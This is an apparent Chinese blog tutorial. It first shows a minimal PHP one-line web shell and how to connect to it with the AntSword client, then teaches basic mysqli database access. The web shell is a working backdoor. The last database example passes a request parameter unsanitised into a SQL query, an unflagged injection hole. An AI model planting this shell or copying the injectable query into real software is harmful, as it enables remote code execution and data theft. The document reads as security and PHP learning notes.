php简单后门实现及php连接数据库

php简单后门实现

代码

php 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>easybackdoor</title>
</head>
<body>
    <?php
        $_GET['x']($_GET['y']);
    
    ?>
    
</body>
</html>

效果

使用蚁剑连接

php 复制代码
  <?php
        $_GET['x']($_POST['y']);
    ?>

使用hackbar传参,前面传assert

添加蚁剑数据,需要选择base64

连接成功

php连接数据库

相关函数

函数名 作用
mysqli_connect() 与MySQL 数据库建立连接。
mysqli_close() 关闭与MYSQL 数据库建立的连接。
mysqli_connect_errno() 与MySQL 数据库建立连接时,发生错误时的错误编号。
mysqli_connect_error() 与MySQL 数据库建立连接时,发生错误时的错误信息。
mysqli_query() 执行SQL 语句。
mysqli_errno() 执行SQL 语句时,发生错误的编号。
mysqli_error() 执行SQL 语句时,发生错误的信息。
mysqli_fetch_assoc() 从结果集对象中取数据,按条取数据。
函数 说明
mysqli_fetch_row() 以索引数组的方式获取一条记录的数据
mysqli_fetch_assoc() 以关联数组的方式获取一条记录的数据
mysqli_fetch_array() 以索引数组或关联数组的方式获取一条记录的数据
mysqli_fetch_all() 以索引数组或关联数组的方式获取全部记录的数据
mysqli_num_rows() 获取结果集对象中数据条数
mysqli_free_result() 释放与一个结果集合相关的内存

交互过程

  • 建立与MySQL 链接。
  • 执行SQL 语句,返回结果集对象。
  • 从结果集对象中取数据。
  • 关闭与MySQL 链接

建立链接

php 复制代码
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "bbs";

$link = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);

如果链接成功,返回object(mysqli)1;否则,返回bool(false)。

$link 是对象类型的变量,相当于一个"令牌"。

捕获连接错误
  • 错误编号
  • 错误详情
php 复制代码
if(!$link){
    exit("[".mysqli_connect_errno()."] ".mysqli_connect_error());
}

关闭链接

php 复制代码
mysqli_close($link);

执行SQL

单条SQL 语句执行
php 复制代码
$sql = "select * from users1;";

$results =  mysqli_query($link, $sql);

如果SQL 语句正常执行,就会返回对象类型object(mysqli_result)#2 的数据;否则,bool(false)。

对于insert,delete,update 等不会返回数据的SQL 语句,在执行没有错误时将返回true。对于返回数据的SQL 语句执行成功的时候会返回结果集对象,可以使用操作结果集对象的函数来从中获取数据。

SQL 错误

如果在执行SQL 语句的时候发生错误,mysqli_query 将返回false。可以使用以下函数捕获错误原因:

php 复制代码
if(!$results){
    exit("[".mysqli_errno($link)."] ".mysqli_error($link));
}

完整代码实现

执行结果,遍历输出该表并写入表格

php 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mysqlconnect</title>
</head>
<body>
    <?php
        $db_host="127.0.0.1";
        $db_user="root";
        $db_pass="root";
        $db_name="bbs";

        $link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);
        
        if(!$link){
            echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();
            exit();
        }else{
            echo "link access";
        }

        $sql="select * from message;";
        $results=mysqli_query($link,$sql);
        if(!$results){
            echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);
        }
        echo "<table border=2>";
        echo "<tr><td>id</td><td>uid</td>
              <td>title</td><td>content</td></tr>";
        while($result=mysqli_fetch_assoc($results)){
            echo "<tr>";
            foreach($result as $k => $v){
                echo "<td>";
                echo $v;
                echo "</td>";
            }
            echo "</tr>";
        }
        
        echo "</table>";
        mysqli_close($link); 

    ?>
    
</body>
</html>

可以实现根据id查询到数控,并且返回的有用户名了

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mysqlconnect</title>
</head>
<body>
    <?php
        $db_host="127.0.0.1";
        $db_user="root";
        $db_pass="root";
        $db_name="bbs";

        $link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);
        
        if(!$link){
            echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();
            exit();
        }else{
            echo "link access";
        }
        $id=isset($_REQUEST['id'])?$_REQUEST['id']:1;
       
        $sql="select m.id,u.username,m.title,m.content from message m,user u where u.id=m.uid and m.id=$id;";
        $results=mysqli_query($link,$sql);
        if(!$results){
            echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);
        }
        echo "<table border=2>";
        echo "<tr><td>id</td><td>username</td>
              <td>title</td><td>content</td></tr>";
        while($result=mysqli_fetch_assoc($results)){
            echo "<tr>";
            foreach($result as $k => $v){
                echo "<td>";
                echo $v;
                echo "</td>";
            }
            echo "</tr>";
        }
        
        echo "</table>";
        mysqli_close($link); 

    ?>
    
</body>
</html>
相关推荐
事业运财运爆棚几秒前
php 如何将数组转成对象数组
php
芊寻(嵌入式)10 分钟前
C转C++学习笔记--基础知识摘录总结
开发语言·c++·笔记·学习
一颗松鼠19 分钟前
JavaScript 闭包是什么?简单到看完就理解!
开发语言·前端·javascript·ecmascript
有梦想的咸鱼_21 分钟前
go实现并发安全hashtable 拉链法
开发语言·golang·哈希算法
海阔天空_201326 分钟前
Python pyautogui库:自动化操作的强大工具
运维·开发语言·python·青少年编程·自动化
MonkeyKing_sunyuhua31 分钟前
ubuntu22.04 docker-compose安装postgresql数据库
数据库·docker·postgresql
天郁青31 分钟前
数据库交互的本地项目:后台管理系统
数据库·交互
天下皆白_唯我独黑33 分钟前
php 使用qrcode制作二维码图片
开发语言·php
马剑威(威哥爱编程)37 分钟前
MongoDB面试专题33道解析
数据库·mongodb·面试
夜雨翦春韭37 分钟前
Java中的动态代理
java·开发语言·aop·动态代理